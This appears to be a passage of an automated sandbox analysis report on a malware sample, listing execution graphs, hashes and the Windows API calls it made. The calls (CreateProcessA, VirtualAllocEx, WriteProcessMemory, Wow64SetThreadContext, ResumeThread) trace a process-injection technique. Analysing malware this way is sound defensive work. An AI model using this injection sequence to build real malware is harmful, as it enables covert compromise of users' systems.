                                                                                        • Instruction Fuzzy Hash: B911BE75904280CFDB16CF54D9C4B15BF62FB44714F24C6AAD8094B756C33AD40ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.5%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:247
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph 31061 8fc1658 31062 8fc17e3 31061->31062 31063 8fc167e 31061->31063 31063->31062 31067 8fc18d8 PostMessageW 31063->31067 31069 8fc18d1 31063->31069 31072 8fc18d4 31063->31072 31068 8fc1944 31067->31068 31068->31063 31070 8fc18d6 PostMessageW 31069->31070 31071 8fc1944 31070->31071 31071->31063 31073 8fc18d6 PostMessageW 31072->31073 31074 8fc1944 31073->31074 31074->31063 30787 12f4668 30788 12f467a 30787->30788 30789 12f4686 30788->30789 30791 12f4779 30788->30791 30792 12f479d 30791->30792 30796 12f4879 30792->30796 30800 12f4888 30792->30800 30798 12f48af 30796->30798 30797 12f498c 30797->30797 30798->30797 30804 12f44b4 30798->30804 30802 12f48af 30800->30802 30801 12f498c 30801->30801 30802->30801 30803 12f44b4 CreateActCtxA 30802->30803 30803->30801 30805 12f5918 CreateActCtxA 30804->30805 30807 12f59db 30805->30807 30807->30807 30808 990e398 30813 8fc03cc 30808->30813 30820 8fc03c0 30808->30820 30827 8fc03d0 30808->30827 30809 990e3a7 30814 8fc03e5 30813->30814 30834 8fc040d 30814->30834 30850 8fc0401 30814->30850 30866 8fc0410 30814->30866 30882 8fc0476 30814->30882 30815 8fc03f7 30815->30809 30821 8fc03c6 30820->30821 30823 8fc040d 18 API calls 30821->30823 30824 8fc0476 18 API calls 30821->30824 30825 8fc0410 18 API calls 30821->30825 30826 8fc0401 18 API calls 30821->30826 30822 8fc03f7 30822->30809 30823->30822 30824->30822 30825->30822 30826->30822 30828 8fc03e5 30827->30828 30830 8fc040d 18 API calls 30828->30830 30831 8fc0476 18 API calls 30828->30831 30832 8fc0410 18 API calls 30828->30832 30833 8fc0401 18 API calls 30828->30833 30829 8fc03f7 30829->30809 30830->30829 30831->30829 30832->30829 30833->30829 30835 8fc042a 30834->30835 30899 8fc0b61 30835->30899 30909 8fc0a41 30835->30909 30915 8fc09a7 30835->30915 30921 8fc0a26 30835->30921 30927 8fc08eb 30835->30927 30933 8fc114a 30835->30933 30938 8fc0873 30835->30938 30945 8fc0df1 30835->30945 30951 8fc0b31 30835->30951 30956 8fc0b1b 30835->30956 30962 8fc0ad8 30835->30962 30967 8fc0a9f 30835->30967 30971 8fc1023 30835->30971 30836 8fc0432 30836->30815 30851 8fc0406 30850->30851 30853 8fc0a9f 2 API calls 30851->30853 30854 8fc0ad8 3 API calls 30851->30854 30855 8fc0b1b 3 API calls 30851->30855 30856 8fc0b31 3 API calls 30851->30856 30857 8fc0df1 3 API calls 30851->30857 30858 8fc0873 4 API calls 30851->30858 30859 8fc114a 3 API calls 30851->30859 30860 8fc08eb 4 API calls 30851->30860 30861 8fc0a26 3 API calls 30851->30861 30862 8fc09a7 3 API calls 30851->30862 30863 8fc0a41 3 API calls 30851->30863 30864 8fc0b61 5 API calls 30851->30864 30865 8fc1023 3 API calls 30851->30865 30852 8fc0432 30852->30815 30853->30852 30854->30852 30855->30852 30856->30852 30857->30852 30858->30852 30859->30852 30860->30852 30861->30852 30862->30852 30863->30852 30864->30852 30865->30852 30867 8fc042a 30866->30867 30869 8fc0a9f 2 API calls 30867->30869 30870 8fc0ad8 3 API calls 30867->30870 30871 8fc0b1b 3 API calls 30867->30871 30872 8fc0b31 3 API calls 30867->30872 30873 8fc0df1 3 API calls 30867->30873 30874 8fc0873 4 API calls 30867->30874 30875 8fc114a 3 API calls 30867->30875 30876 8fc08eb 4 API calls 30867->30876 30877 8fc0a26 3 API calls 30867->30877 30878 8fc09a7 3 API calls 30867->30878 30879 8fc0a41 3 API calls 30867->30879 30880 8fc0b61 5 API calls 30867->30880 30881 8fc1023 3 API calls 30867->30881 30868 8fc0432 30868->30815 30869->30868 30870->30868 30871->30868 30872->30868 30873->30868 30874->30868 30875->30868 30876->30868 30877->30868 30878->30868 30879->30868 30880->30868 30881->30868 30883 8fc0404 30882->30883 30885 8fc0479 30882->30885 30886 8fc0a9f 2 API calls 30883->30886 30887 8fc0ad8 3 API calls 30883->30887 30888 8fc0b1b 3 API calls 30883->30888 30889 8fc0b31 3 API calls 30883->30889 30890 8fc0df1 3 API calls 30883->30890 30891 8fc0873 4 API calls 30883->30891 30892 8fc114a 3 API calls 30883->30892 30893 8fc08eb 4 API calls 30883->30893 30894 8fc0a26 3 API calls 30883->30894 30895 8fc09a7 3 API calls 30883->30895 30896 8fc0a41 3 API calls 30883->30896 30897 8fc0b61 5 API calls 30883->30897 30898 8fc1023 3 API calls 30883->30898 30884 8fc0432 30884->30815 30885->30815 30886->30884 30887->30884 30888->30884 30889->30884 30890->30884 30891->30884 30892->30884 30893->30884 30894->30884 30895->30884 30896->30884 30897->30884 30898->30884 30900 8fc0b6e 30899->30900 30902 8fc0a53 30899->30902 30989 990d570 30900->30989 30993 990d578 30900->30993 30901 8fc0e68 30901->30836 30902->30901 30977 990d4c0 30902->30977 30981 990d4c8 30902->30981 30985 990d4c4 30902->30985 30903 8fc0a7f 30903->30836 30910 8fc0a6a 30909->30910 30912 990d4c0 ResumeThread 30910->30912 30913 990d4c4 ResumeThread 30910->30913 30914 990d4c8 ResumeThread 30910->30914 30911 8fc0a7f 30911->30836 30912->30911 30913->30911 30914->30911 30916 8fc0a6a 30915->30916 30918 990d4c0 ResumeThread 30916->30918 30919 990d4c4 ResumeThread 30916->30919 30920 990d4c8 ResumeThread 30916->30920 30917 8fc0a7f 30917->30836 30918->30917 30919->30917 30920->30917 30922 8fc0a2c 30921->30922 30997 990db40 30922->30997 31001 990db48 30922->31001 31005 990db44 30922->31005 30923 8fc0951 30923->30836 31009 990ddd0 30927->31009 31013 990ddcc 30927->31013 31017 990ddc9 30927->31017 31021 990ddc4 30927->31021 31025 990dc30 30933->31025 31029 990dc38 30933->31029 31033 990dc34 30933->31033 30934 8fc0951 30934->30836 30939 8fc0885 30938->30939 30940 8fc0926 30939->30940 30941 990ddd0 CreateProcessA 30939->30941 30942 990ddc4 CreateProcessA 30939->30942 30943 990ddc9 CreateProcessA 30939->30943 30944 990ddcc CreateProcessA 30939->30944 30940->30836 30941->30940 30942->30940 30943->30940 30944->30940 30946 8fc111e 30945->30946 30947 8fc0d20 30946->30947 30948 990db40 WriteProcessMemory 30946->30948 30949 990db44 WriteProcessMemory 30946->30949 30950 990db48 WriteProcessMemory 30946->30950 30948->30946 30949->30946 30950->30946 31037 990da81 30951->31037 31041 990da88 30951->31041 31045 990da84 30951->31045 30952 8fc0b4f 30957 8fc0a2d 30956->30957 30959 990db40 WriteProcessMemory 30957->30959 30960 990db44 WriteProcessMemory 30957->30960 30961 990db48 WriteProcessMemory 30957->30961 30958 8fc0951 30958->30836 30959->30958 30960->30958 30961->30958 30964 990db40 WriteProcessMemory 30962->30964 30965 990db44 WriteProcessMemory 30962->30965 30966 990db48 WriteProcessMemory 30962->30966 30963 8fc0afc 30963->30836 30964->30963 30965->30963 30966->30963 30969 990d570 Wow64SetThreadContext 30967->30969 30970 990d578 Wow64SetThreadContext 30967->30970 30968 8fc0a40 30968->30836 30969->30968 30970->30968 30972 8fc103b 30971->30972 30974 990db40 WriteProcessMemory 30972->30974 30975 990db44 WriteProcessMemory 30972->30975 30976 990db48 WriteProcessMemory 30972->30976 30973 8fc0951 30973->30836 30974->30973 30975->30973 30976->30973 30978 990d4c6 ResumeThread 30977->30978 30980 990d539 30978->30980 30980->30903 30982 990d508 ResumeThread 30981->30982 30984 990d539 30982->30984 30984->30903 30986 990d4c6 ResumeThread 30985->30986 30988 990d539 30986->30988 30988->30903 30990 990d5bd Wow64SetThreadContext 30989->30990 30992 990d605 30990->30992 30992->30903 30994 990d5bd Wow64SetThreadContext 30993->30994 30996 990d605 30994->30996 30996->30903 30998 990db46 WriteProcessMemory 30997->30998 31000 990dbe7 30998->31000 31000->30923 31002 990db90 WriteProcessMemory 31001->31002 31004 990dbe7 31002->31004 31004->30923 31006 990db46 WriteProcessMemory 31005->31006 31008 990dbe7 31006->31008 31008->30923 31010 990de59 CreateProcessA 31009->31010 31012 990e01b 31010->31012 31014 990ddce CreateProcessA 31013->31014 31016 990e01b 31014->31016 31018 990ddca CreateProcessA 31017->31018 31020 990e01b 31018->31020 31022 990ddca CreateProcessA 31021->31022 31024 990e01b 31022->31024 31026 990dc36 ReadProcessMemory 31025->31026 31028 990dcc7 31026->31028 31028->30934 31030 990dc83 ReadProcessMemory 31029->31030 31032 990dcc7 31030->31032 31032->30934 31034 990dc36 ReadProcessMemory 31033->31034 31036 990dcc7 31034->31036 31036->30934 31038 990da86 VirtualAllocEx 31037->31038 31040 990db05 31038->31040 31040->30952 31042 990dac8 VirtualAllocEx 31041->31042 31044 990db05 31042->31044 31044->30952 31046 990da86 VirtualAllocEx 31045->31046 31048 990db05 31046->31048 31048->30952 31049 12fd060 31050 12fd0a6 GetCurrentProcess 31049->31050 31052 12fd0f8 GetCurrentThread 31050->31052 31053 12fd0f1 31050->31053 31054 12fd12e 31052->31054 31055 12fd135 GetCurrentProcess 31052->31055 31053->31052 31054->31055 31056 12fd16b 31055->31056 31057 12fd193 GetCurrentThreadId 31056->31057 31058 12fd1c4 31057->31058 31059 12fd6b0 DuplicateHandle 31060 12fd746 31059->31060 31075 12facd0 31076 12facdf 31075->31076 31079 12fadc8 31075->31079 31087 12fadb7 31075->31087 31080 12fadd9 31079->31080 31081 12fadfc 31079->31081 31080->31081 31095 12fb051 31080->31095 31099 12fb060 31080->31099 31081->31076 31082 12fadf4 31082->31081 31083 12fb000 GetModuleHandleW 31082->31083 31084 12fb02d 31083->31084 31084->31076 31088 12fadfc 31087->31088 31089 12fadd9 31087->31089 31088->31076 31089->31088 31093 12fb051 LoadLibraryExW 31089->31093 31094 12fb060 LoadLibraryExW 31089->31094 31090 12fadf4 31090->31088 31091 12fb000 GetModuleHandleW 31090->31091 31092 12fb02d 31091->31092 31092->31076 31093->31090 31094->31090 31097 12fb074 31095->31097 31096 12fb099 31096->31082 31097->31096 31103 12fa150 31097->31103 31100 12fb074 31099->31100 31101 12fb099 31100->31101 31102 12fa150 LoadLibraryExW 31100->31102 31101->31082 31102->31101 31104 12fb240 LoadLibraryExW 31103->31104 31106 12fb2b9 31104->31106 31106->31096

                                                                                        Executed Functions

                                                                                        Function 012FD051 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 476 12fd051-12fd0ef GetCurrentProcess 480 12fd0f8-12fd12c GetCurrentThread 476->480 481 12fd0f1-12fd0f7 476->481 482 12fd12e-12fd134 480->482 483 12fd135-12fd169 GetCurrentProcess 480->483 481->480 482->483 485 12fd16b-12fd171 483->485 486 12fd172-12fd18d call 12fd638 483->486 485->486 488 12fd193-12fd1c2 GetCurrentThreadId 486->488 490 12fd1cb-12fd22d 488->490 491 12fd1c4-12fd1ca 488->491 491->490
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 012FD11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012FD1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e669d246876046a453ca958af5f2c4028d3c9b657fab2fe3d06f2f7b94dc69cb
                                                                                        • Instruction ID: 1dd6e895345a3d437619baeb5c5cc678c4a23f093a1edc7d611bf5543fbe8559
                                                                                        • Opcode Fuzzy Hash: e669d246876046a453ca958af5f2c4028d3c9b657fab2fe3d06f2f7b94dc69cb
                                                                                        • Instruction Fuzzy Hash: 575144B09102498FDB18CFA9D548BEEBBF1AB88304F20846DD119AB360D7359889CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD060 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 498 12fd060-12fd0ef GetCurrentProcess 502 12fd0f8-12fd12c GetCurrentThread 498->502 503 12fd0f1-12fd0f7 498->503 504 12fd12e-12fd134 502->504 505 12fd135-12fd169 GetCurrentProcess 502->505 503->502 504->505 507 12fd16b-12fd171 505->507 508 12fd172-12fd18d call 12fd638 505->508 507->508 510 12fd193-12fd1c2 GetCurrentThreadId 508->510 512 12fd1cb-12fd22d 510->512 513 12fd1c4-12fd1ca 510->513 513->512
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 012FD11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012FD1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 2289bdf22608dbd01d33757dbb9337ccdf4e2991e0a749dab9511eec0f848523
                                                                                        • Instruction ID: b605147e43ae56e4860d58b93033b7840ae671c8f71508dc376ac9cb7288157c
                                                                                        • Opcode Fuzzy Hash: 2289bdf22608dbd01d33757dbb9337ccdf4e2991e0a749dab9511eec0f848523
                                                                                        • Instruction Fuzzy Hash: 965124B0D102498FDB18DFA9D548B9EFBF1BB88304F208469D519AB360DB349988CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DDC4 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 664 990ddc4-990de65 668 990de67-990de71 664->668 669 990de9e-990debe 664->669 668->669 670 990de73-990de75 668->670 676 990dec0-990deca 669->676 677 990def7-990df26 669->677 671 990de77-990de81 670->671 672 990de98-990de9b 670->672 674 990de83 671->674 675 990de85-990de94 671->675 672->669 674->675 675->675 678 990de96 675->678 676->677 679 990decc-990dece 676->679 683 990df28-990df32 677->683 684 990df5f-990e019 CreateProcessA 677->684 678->672 681 990ded0-990deda 679->681 682 990def1-990def4 679->682 685 990dedc 681->685 686 990dede-990deed 681->686 682->677 683->684 687 990df34-990df36 683->687 697 990e022-990e0a8 684->697 698 990e01b-990e021 684->698 685->686 686->686 688 990deef 686->688 689 990df38-990df42 687->689 690 990df59-990df5c 687->690 688->682 692 990df44 689->692 693 990df46-990df55 689->693 690->684 692->693 693->693 694 990df57 693->694 694->690 708 990e0b8-990e0bc 697->708 709 990e0aa-990e0ae 697->709 698->697 711 990e0cc-990e0d0 708->711 712 990e0be-990e0c2 708->712 709->708 710 990e0b0 709->710 710->708 714 990e0e0-990e0e4 711->714 715 990e0d2-990e0d6 711->715 712->711 713 990e0c4 712->713 713->711 716 990e0f6-990e0fd 714->716 717 990e0e6-990e0ec 714->717 715->714 718 990e0d8 715->718 719 990e114 716->719 720 990e0ff-990e10e 716->720 717->716 718->714 722 990e115 719->722 720->719 722->722
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: e46fd8ac6a10a16c07a2f157819602e81d750c205dbfe751ef365624dc68fc37
                                                                                        • Instruction ID: 7f34543de4ae183889e94aa60fe4acdc81540d9490a4c600b22f27453e5db790
                                                                                        • Opcode Fuzzy Hash: e46fd8ac6a10a16c07a2f157819602e81d750c205dbfe751ef365624dc68fc37
                                                                                        • Instruction Fuzzy Hash: 26914A71D00219CFDF24CFA8C8517ADBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DDC9 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 723 990ddc9-990de65 727 990de67-990de71 723->727 728 990de9e-990debe 723->728 727->728 729 990de73-990de75 727->729 735 990dec0-990deca 728->735 736 990def7-990df26 728->736 730 990de77-990de81 729->730 731 990de98-990de9b 729->731 733 990de83 730->733 734 990de85-990de94 730->734 731->728 733->734 734->734 737 990de96 734->737 735->736 738 990decc-990dece 735->738 742 990df28-990df32 736->742 743 990df5f-990e019 CreateProcessA 736->743 737->731 740 990ded0-990deda 738->740 741 990def1-990def4 738->741 744 990dedc 740->744 745 990dede-990deed 740->745 741->736 742->743 746 990df34-990df36 742->746 756 990e022-990e0a8 743->756 757 990e01b-990e021 743->757 744->745 745->745 747 990deef 745->747 748 990df38-990df42 746->748 749 990df59-990df5c 746->749 747->741 751 990df44 748->751 752 990df46-990df55 748->752 749->743 751->752 752->752 753 990df57 752->753 753->749 767 990e0b8-990e0bc 756->767 768 990e0aa-990e0ae 756->768 757->756 770 990e0cc-990e0d0 767->770 771 990e0be-990e0c2 767->771 768->767 769 990e0b0 768->769 769->767 773 990e0e0-990e0e4 770->773 774 990e0d2-990e0d6 770->774 771->770 772 990e0c4 771->772 772->770 775 990e0f6-990e0fd 773->775 776 990e0e6-990e0ec 773->776 774->773 777 990e0d8 774->777 778 990e114 775->778 779 990e0ff-990e10e 775->779 776->775 777->773 781 990e115 778->781 779->778 781->781
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: cb70e65817c86bb6cb8c84eb1601c1a607eaa53707d1302ac445597978206544
                                                                                        • Instruction ID: f648dda47787637e72f95d400db0928552107be34ec9f4ed2f972e9d94d438d2
                                                                                        • Opcode Fuzzy Hash: cb70e65817c86bb6cb8c84eb1601c1a607eaa53707d1302ac445597978206544
                                                                                        • Instruction Fuzzy Hash: 9F915971D00219CFDF24CFA8C8517EDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DDD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 840 990ddd0-990de65 842 990de67-990de71 840->842 843 990de9e-990debe 840->843 842->843 844 990de73-990de75 842->844 850 990dec0-990deca 843->850 851 990def7-990df26 843->851 845 990de77-990de81 844->845 846 990de98-990de9b 844->846 848 990de83 845->848 849 990de85-990de94 845->849 846->843 848->849 849->849 852 990de96 849->852 850->851 853 990decc-990dece 850->853 857 990df28-990df32 851->857 858 990df5f-990e019 CreateProcessA 851->858 852->846 855 990ded0-990deda 853->855 856 990def1-990def4 853->856 859 990dedc 855->859 860 990dede-990deed 855->860 856->851 857->858 861 990df34-990df36 857->861 871 990e022-990e0a8 858->871 872 990e01b-990e021 858->872 859->860 860->860 862 990deef 860->862 863 990df38-990df42 861->863 864 990df59-990df5c 861->864 862->856 866 990df44 863->866 867 990df46-990df55 863->867 864->858 866->867 867->867 868 990df57 867->868 868->864 882 990e0b8-990e0bc 871->882 883 990e0aa-990e0ae 871->883 872->871 885 990e0cc-990e0d0 882->885 886 990e0be-990e0c2 882->886 883->882 884 990e0b0 883->884 884->882 888 990e0e0-990e0e4 885->888 889 990e0d2-990e0d6 885->889 886->885 887 990e0c4 886->887 887->885 890 990e0f6-990e0fd 888->890 891 990e0e6-990e0ec 888->891 889->888 892 990e0d8 889->892 893 990e114 890->893 894 990e0ff-990e10e 890->894 891->890 892->888 896 990e115 893->896 894->893 896->896
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 71610b05a28524e8c75a25aa25e7a53a7437ddf44705f42f6c861c080b8442fe
                                                                                        • Instruction ID: 3b263a3001441e9b89ddd357242008f828bba7b074ce08da90a4c08e3ac4b00b
                                                                                        • Opcode Fuzzy Hash: 71610b05a28524e8c75a25aa25e7a53a7437ddf44705f42f6c861c080b8442fe
                                                                                        • Instruction Fuzzy Hash: C6916B71D00219CFDF14CFA8C851BEDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DDCC Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 782 990ddcc-990de65 785 990de67-990de71 782->785 786 990de9e-990debe 782->786 785->786 787 990de73-990de75 785->787 793 990dec0-990deca 786->793 794 990def7-990df26 786->794 788 990de77-990de81 787->788 789 990de98-990de9b 787->789 791 990de83 788->791 792 990de85-990de94 788->792 789->786 791->792 792->792 795 990de96 792->795 793->794 796 990decc-990dece 793->796 800 990df28-990df32 794->800 801 990df5f-990e019 CreateProcessA 794->801 795->789 798 990ded0-990deda 796->798 799 990def1-990def4 796->799 802 990dedc 798->802 803 990dede-990deed 798->803 799->794 800->801 804 990df34-990df36 800->804 814 990e022-990e0a8 801->814 815 990e01b-990e021 801->815 802->803 803->803 805 990deef 803->805 806 990df38-990df42 804->806 807 990df59-990df5c 804->807 805->799 809 990df44 806->809 810 990df46-990df55 806->810 807->801 809->810 810->810 811 990df57 810->811 811->807 825 990e0b8-990e0bc 814->825 826 990e0aa-990e0ae 814->826 815->814 828 990e0cc-990e0d0 825->828 829 990e0be-990e0c2 825->829 826->825 827 990e0b0 826->827 827->825 831 990e0e0-990e0e4 828->831 832 990e0d2-990e0d6 828->832 829->828 830 990e0c4 829->830 830->828 833 990e0f6-990e0fd 831->833 834 990e0e6-990e0ec 831->834 832->831 835 990e0d8 832->835 836 990e114 833->836 837 990e0ff-990e10e 833->837 834->833 835->831 839 990e115 836->839 837->836 839->839
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0d60b5de3517e50bda82ffd55eca35158a08aa1c390f5f1fbeb4177e7c022284
                                                                                        • Instruction ID: e30f93380141859fa6d725cb0ca2685c39d682ea9816db0909e0ab0ebc7e4351
                                                                                        • Opcode Fuzzy Hash: 0d60b5de3517e50bda82ffd55eca35158a08aa1c390f5f1fbeb4177e7c022284
                                                                                        • Instruction Fuzzy Hash: C5915A71D00219CFDF24CFA8C8517EDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FADC8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 897 12fadc8-12fadd7 898 12fadd9-12fade6 call 12fa0ec 897->898 899 12fae03-12fae07 897->899 904 12fadfc 898->904 905 12fade8 898->905 900 12fae1b-12fae5c 899->900 901 12fae09-12fae13 899->901 908 12fae5e-12fae66 900->908 909 12fae69-12fae77 900->909 901->900 904->899 952 12fadee call 12fb051 905->952 953 12fadee call 12fb060 905->953 908->909 911 12fae9b-12fae9d 909->911 912 12fae79-12fae7e 909->912 910 12fadf4-12fadf6 910->904 913 12faf38-12faff8 910->913 914 12faea0-12faea7 911->914 915 12fae89 912->915 916 12fae80-12fae87 call 12fa0f8 912->916 947 12faffa-12faffd 913->947 948 12fb000-12fb02b GetModuleHandleW 913->948 918 12faea9-12faeb1 914->918 919 12faeb4-12faebb 914->919 920 12fae8b-12fae99 915->920 916->920 918->919 922 12faebd-12faec5 919->922 923 12faec8-12faeca call 12fa108 919->923 920->914 922->923 926 12faecf-12faed1 923->926 928 12faede-12faee3 926->928 929 12faed3-12faedb 926->929 931 12faee5-12faeec 928->931 932 12faf01-12faf0e 928->932 929->928 931->932 933 12faeee-12faefe call 12fa118 call 12fa128 931->933 937 12faf31-12faf37 932->937 938 12faf10-12faf2e 932->938 933->932 938->937 947->948 949 12fb02d-12fb033 948->949 950 12fb034-12fb048 948->950 949->950 952->910 953->910
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012FB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 85b0388aa30d873c638781a3b626e2f9c4e0ad9eb8971ee080bd0b2fd988d201
                                                                                        • Instruction ID: 88a99a6645183b5d28e73f97eeb65969149222c4049da56b2f832541ddca29b1
                                                                                        • Opcode Fuzzy Hash: 85b0388aa30d873c638781a3b626e2f9c4e0ad9eb8971ee080bd0b2fd988d201
                                                                                        • Instruction Fuzzy Hash: 9E811670A10B068FDB24DF29D45579ABBF1FF88304F008A2DD68ADBA50D775E949CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012F590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 954 12f590c-12f59d9 CreateActCtxA 956 12f59db-12f59e1 954->956 957 12f59e2-12f5a3c 954->957 956->957 964 12f5a3e-12f5a41 957->964 965 12f5a4b-12f5a4f 957->965 964->965 966 12f5a51-12f5a5d 965->966 967 12f5a60 965->967 966->967 969 12f5a61 967->969 969->969
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 012F59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5d883dcbf5ae53c532c66e6dc5d3da40a4c02a810569e61f802355d6632d0a18
                                                                                        • Instruction ID: 1d979678c8b31d6b3e127bb24950a44f246d054279f86aa655a1df4b52152896
                                                                                        • Opcode Fuzzy Hash: 5d883dcbf5ae53c532c66e6dc5d3da40a4c02a810569e61f802355d6632d0a18
                                                                                        • Instruction Fuzzy Hash: DF41EDB1C10719CFDB28CFA9C984ADEBBF5BF49304F20816AD508AB251DB756985CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012F44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
